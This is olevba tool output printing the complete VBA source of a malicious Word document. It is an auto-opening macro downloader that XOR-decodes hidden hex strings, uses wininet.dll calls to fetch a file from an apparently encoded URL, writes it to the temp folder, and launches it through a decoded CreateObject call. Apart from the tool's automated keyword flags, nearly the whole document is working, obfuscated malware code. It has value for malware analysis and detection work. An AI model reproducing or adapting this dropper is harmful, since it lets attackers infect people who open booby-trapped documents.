Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- teleph~1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: teleph~1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub COLTON(FELIX As Long)
17. JOSPEH
18. End Sub
19.  
20. Sub autoopen()
21. COLTON (298)
22. End Sub
23.  
24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
25. ANALYSIS:
26. +----------+----------+---------------------------------------+
27. | Type     | Keyword  | Description                           |
28. +----------+----------+---------------------------------------+
29. | AutoExec | AutoOpen | Runs when the Word document is opened |
30. +----------+----------+---------------------------------------+
31. -------------------------------------------------------------------------------
32. VBA MACRO ELDRIDGE.bas
33. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ELDRIDGE'
34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
35.  
36. Public Sub JOSPEH()
37.         Dim BERT As Long
38.  
39.     Dim MARCELLUS As Long
40. For MARCELLUS = 5 To 11
41. MARCELLUS = MARCELLUS * 3
42. Next MARCELLUS
43.  
44. DOMINGO (8.2)
45.  
46. End Sub
47.  
48. Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
49. EDMUNDO = EDMUNDO * 2
50. PORTER = FRANKLYN(TERRENCE, ENRIQUE)
51.    
52. End Function
53.  
54. Public Function LYNWOOD(ByRef TITUS As Object, ByRef HOMER As Object) As Boolean
55.  
56. Dim RENALDO As Long
57. Set TITUS = WARNER(JEWEL)
58.  
59. Dim JODY
60.  
61. Dim AMBROSE As String
62. AMBROSE = PORTER(3213, LEANDRO, JEROMY)
63.  
64. For RENALDO = 11 To 33
65. RENALDO = RENALDO * 4
66. Next RENALDO
67. JODY = TITUS & AMBROSE
68.  
69.  
70. If ANTIONE(475, JODY) Then
71. End If
72.  
73.  
74. LYNWOOD = MICHAL(TITUS, AMBROSE, 11)
75.  
76. End Function
77.  
78. Public Function GASTON(ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
79.     GASTON = ChrW(GAYLORD Xor MANUAL)
80. End Function
81.  
82.  
83. Public Function LOWELL(BRODNATHANIAL As String) As Integer
84.     LOWELL = FreeFile
85. End Function
86.  
87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
88. ANALYSIS:
89. +------------+---------+-----------------------------------------+
90. | Type       | Keyword | Description                             |
91. +------------+---------+-----------------------------------------+
92. | Suspicious | ChrW    | May attempt to obfuscate specific       |
93. |            |         | strings                                 |
94. | Suspicious | Xor     | May attempt to obfuscate specific       |
95. |            |         | strings                                 |
96. +------------+---------+-----------------------------------------+
97. -------------------------------------------------------------------------------
98. VBA MACRO FELTON.bas
99. in file: teleph~1.doc - OLE stream: u'Macros/VBA/FELTON'
100. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
101.  
102.  
103. Public Const RUEBEN = 5555
104. Public Const STACYK As String = "ARNOLDO"
105. Public Const HARLAND = 1
106. Public Const ELIJAH = &H4000000
107.  
108. Public Const HOBERT = "1B293C22296D002222232551323C283620"
109. Public Const JEROMY = "14323C3C20212E396061294A36"
110. Public Const JERRELL = "20352D3E7F6C6E3F3D3D3E5B203C2E373C23202C333E2A2F5A3C2133772137246E63667C630165706F3C3620"
111. Public Const KRAIG = "1B222B273537283C35610A5B3F2D12203D31262C1D3025295127"
112. Public Const LEANDRO = "SHAYNECARROL2"
113.  
114.  
115.  
116.  
117. Sub DOMINGO(SANTOS As Double)
118.  
119. AUBREY ("DEANGELOFILIBERTO")
120. End Sub
121.  
122.  
123. Public Function WARNER(ByRef ARLEN As Object) As Object
124. Set WARNER = ARLEN.GetSpecialFolder(2)
125. End Function
126.  
127. Public Function FRANKLYN(NATHANIAL As String, REYNALDO As String) As String
128.    
129.     Dim GAYLORD As Integer
130.     Dim MANUAL As Integer
131.    
132.    
133.     Dim KRISTOFER As Integer
134. For KRISTOFER = 43 To 44
135. If KRISTOFER = 55 Then End
136. Next KRISTOFER
137.    
138.     Dim CLAUD As Long
139.     Dim TERENCE As String
140.     For CLAUD = 1 To (JORDON(REYNALDO) / 2)
141.         GAYLORD = FRANCESCO(REYNALDO, CLAUD)
142.         MANUAL = GILBERTO(NATHANIAL, CLAUD)
143.         TERENCE = TERENCE + GASTON(GAYLORD, MANUAL)
144.     Next CLAUD
145.    FRANKLYN = TERENCE
146. End Function
147.  
148. Public Function MICHAL(ByRef TITUS As Object, ByRef AMBROSE As String, CRISTOBAL As Double) As Boolean
149. Dim SHERWOOD As String
150. SHERWOOD = FRANKLYN(LEANDRO, HOBERT)
151. Set RAYFORD = CreateObject(SHERWOOD)
152. Dim RAYMON As Integer
153. RAYMON = RAYFORD.Open(TITUS & AMBROSE)
154. End Function
155.  
156. Public Function AUBREY(SANTIAGO As String)
157. Dim LESLEY As Integer
158. LESLEY = 1
159. DARELL LESLEY * 2
160. LESLEY = LESLEY + 4
161. End Function
162.  
163.  
164.  
165.  
166.  
167.  
168. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
169. ANALYSIS:
170. +------------+--------------+-----------------------------------------+
171. | Type       | Keyword      | Description                             |
172. +------------+--------------+-----------------------------------------+
173. | Suspicious | CreateObject | May create an OLE object                |
174. | Suspicious | Open         | May open a file                         |
175. | Suspicious | Hex Strings  | Hex-encoded strings were detected, may  |
176. |            |              | be used to obfuscate strings (option    |
177. |            |              | --decode to see all)                    |
178. +------------+--------------+-----------------------------------------+
179. -------------------------------------------------------------------------------
180. VBA MACRO MICHALE.bas
181. in file: teleph~1.doc - OLE stream: u'Macros/VBA/MICHALE'
182. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
183.  
184. Public Function JORDON(BRODNATHANIAL As String) As Long
185. JORDON = Len(BRODNATHANIAL)
186. End Function
187.  
188.  
189. Public Function DARELL(DORSEY As Double)
190.  
191. Dim PORTER As Object
192.  
193.  
194.     Dim ELDEN As Long
195. For ELDEN = 14 To 15
196. ELDEN = ELDEN + 15
197. Next ELDEN
198.    
199.  
200. Dim HAI  As Object
201.  
202.  
203. For ELDEN = 10 To 20
204. ELDEN = ELDEN + 60
205. Next ELDEN
206.    
207.  
208. Set HAI = JEWEL
209. ELDEN = ELDEN + 5
210. Dim LINDSAY As Boolean
211.  
212. If ELDEN > ELDEN * 100 Then End
213. LINDSAY = LYNWOOD(PORTER, HAI)
214. DORSEY = DORSEY + 24
215. End Function
216.  
217.  
218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
219. ANALYSIS:
220. No suspicious keyword or IOC found.
221. -------------------------------------------------------------------------------
222. VBA MACRO TUAN.bas
223. in file: teleph~1.doc - OLE stream: u'Macros/VBA/TUAN'
224. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
225.  
226.  
227. Public Function GILBERTO(ByRef NATHANIAL As String, ByRef CLAUD As Long) As Integer
228. GILBERTO = AscW(DANILO(17, NATHANIAL, ((CLAUD Mod JORDON(NATHANIAL)) + 1), 1))
229. End Function
230.  
231.  
232.  
233.  
234. #If VBA7 And Win64 Then
235.        Public Function CEDRICK(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
236.     #Else
237.        Public Function CEDRICK(ByRef GRADY As Long, NOAH As Long) As Boolean
238.     #End If
239.         Dim PHIL As Double
240. Dim GUADALUPE As String
241. Dim CLARK As Long
242.     GUADALUPE = PORTER(321, LEANDRO, JERRELL)
243.  
244. For PHIL = 14 To 18
245. PHIL = PHIL + 2.1
246. Next PHIL
247.     GRADY = LUIGI(NOAH, GUADALUPE, vbNullString, 0, ELIJAH, 0)
248.     CEDRICK = True
249. End Function
250.  
251. Public Function JEWEL() As Object
252. Dim ISMAEL As String
253. ISMAEL = FRANKLYN(LEANDRO, KRAIG)
254. Set JEWEL = CreateObject(ISMAEL)
255. End Function
256.  
257. Public Function PORTER(EDMUNDO As Long, TERRENCE As String, ENRIQUE As String) As String
258. EDMUNDO = EDMUNDO * 2
259. PORTER = FRANKLYN(TERRENCE, ENRIQUE)
260.    
261. End Function
262.  
263. Public Function ANTIONE(KOREY As Double, ByVal MALCOM As String) As Boolean
264.    
265.         Dim LAMONT As Long
266.     Dim STACY As String * RUEBEN, GARLAND As String
267.     Dim MILES As Integer, MICAH As Double
268.     #If VBA7 And Win64 Then
269.         Dim KASEY As LongPtr, BENTON As LongPtr
270.     #Else
271.         Dim KASEY As Long, BENTON As Long
272.     #End If
273.  
274.     KASEY = WALLY
275.     If KASEY = 0 Then
276.         Exit Function
277.     End If
278.     Dim LUCAS As Boolean
279.    
280.     If CEDRICK(BENTON, KASEY) Then
281.     End If
282.     If BENTON = 0 Then
283.         CRISTOPHER = 0
284.     Else
285.         KENETH BENTON, STACY, RUEBEN, LAMONT
286.         GARLAND = STACY
287.           Dim BOYCE As Integer
288.           BOYCE = 0
289.           BOYCE = BOYCE + 33
290. If BOYCE > BOYCE + 40 Then End
291.         Do While LAMONT <> 0
292.             KENETH BENTON, STACY, RUEBEN, LAMONT
293.                     GARLAND = GARLAND + Mid(STACY, 1, LAMONT)
294.         Loop
295.              CRISTOPHER = JORDON(GARLAND): _
296.              CORTEZ = LOWELL("JERRY")
297.         Open MALCOM For Binary Access Write Lock Write As #CORTEZ
298.         Put #CORTEZ, , GARLAND
299.         BOYCE = BOYCE + 46
300.     If BOYCE < 0 Then End
301.         Close #CORTEZ
302.     End If
303.     GRAIG BENTON
304.     GRAIG KASEY
305.     GARLAND = ""
306.     If CRISTOPHER Then
307.         ANTIONE = True
308.     End If
309. End Function
310.  
311.  
312.  
313. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
314. ANALYSIS:
315. +------------+--------------+-----------------------------------------+
316. | Type       | Keyword      | Description                             |
317. +------------+--------------+-----------------------------------------+
318. | Suspicious | CreateObject | May create an OLE object                |
319. | Suspicious | Open         | May open a file                         |
320. | Suspicious | Write        | May write to a file (if combined with   |
321. |            |              | Open)                                   |
322. | Suspicious | Put          | May write to a file (if combined with   |
323. |            |              | Open)                                   |
324. | Suspicious | Binary       | May read or write a binary file (if     |
325. |            |              | combined with Open)                     |
326. +------------+--------------+-----------------------------------------+
327. -------------------------------------------------------------------------------
328. VBA MACRO ZACKARY.bas
329. in file: teleph~1.doc - OLE stream: u'Macros/VBA/ZACKARY'
330. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
331.  
332.  
333.  
334.  
335. Public Const SPORTER = "JOHN"
336.  
337. #If VBA7 And Win64 Then
338. Public _
339. Declare _
340. PtrSafe _
341. Function _
342. GRAIG Lib _
343. "wininet.dll" Alias "InternetCloseHandle" (ByRef RICHARD As LongPtr) As Long
344. Public _
345. Declare _
346. PtrSafe _
347. Function _
348. WINFORD Lib _
349. "wininet.dll" Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As LongPtr
350. Public _
351. Declare _
352. PtrSafe _
353. Function _
354. KENETH Lib _
355. "wininet.dll" Alias "InternetReadFile" (ByVal PAUL As LongPtr, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
356. Public _
357. Declare _
358. PtrSafe _
359. Function _
360. LUIGI Lib _
361. "wininet.dll" Alias "InternetOpenUrlA" (ByVal KENNETH As LongPtr, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As LongPtr
362. #Else
363. Public Declare Function GRAIG Lib "wininet.dll" _
364. Alias "InternetCloseHandle" (ByRef RICHARD As Long) As Long
365. Public Declare Function WINFORD Lib "wininet.dll" _
366. Alias "InternetOpenA" (ByVal GARLAND As String, ByVal MALCOMPH As Long, ByVal THOMAS As String, ByVal FRANCESCOTOPHER As String, ByVal DANIEL As Long) As Long
367. Public Declare Function KENETH Lib "wininet.dll" _
368. Alias "InternetReadFile" (ByVal PAUL As Long, ByVal STACY As String, ByVal DONALD As Long, GEORGE As Long) As Integer
369. Public Declare Function LUIGI Lib "wininet.dll" _
370. Alias "InternetOpenUrlA" (ByVal KENNETH As Long, ByVal TERENCEN As String, ByVal EDWARD As String, ByVal BRIAN As Long, ByVal RONALD As Long, ByVal ANTHONY As Long) As Long
371. #End If
372.  
373.  
374. Public Function FRANCESCO(ByRef REYNALDO As String, ByRef CLAUD As Long) As Integer
375.  FRANCESCO = Val("&H" & (DANILO(12, REYNALDO, MODESTO(CLAUD), 2)))
376. End Function
377. Public Function MODESTO(ByRef CLAUD As Long) As Long
378.  MODESTO = (2 * CLAUD) - 1
379. End Function
380.  
381.  
382. Public Function DANILO(SAMMY As Long, ByRef BRODNATHANIAL As String, ByRef GAYLORD As Integer, ByRef MANUAL As Integer) As String
383.     DANILO = Mid$(BRODNATHANIAL, GAYLORD, MANUAL)
384.     SAMMY = SAMMY + 52
385. End Function
386. #If VBA7 _
387.     And Win64 Then
388. Public Function WALLY() As LongPtr
389.  #Else
390. Public Function WALLY() As Long
391.  
392.  #End If
393.  
394.  WALLY = WINFORD(STACYK, HARLAND, vbNullString, vbNullString, 0)
395. End Function
396.  
397.  
398.  
399.  
400.  
401.  
402. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
403. ANALYSIS:
404. +------------+----------------+-----------------------------------------+
405. | Type       | Keyword        | Description                             |
406. +------------+----------------+-----------------------------------------+
407. | Suspicious | Lib            | May run code from a DLL                 |
408. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
409. |            |                | may be used to obfuscate strings        |
410. |            |                | (option --decode to see all)            |
411. | IOC        | wininet.dll    | Executable file name                    |
412. +------------+----------------+-----------------------------------------+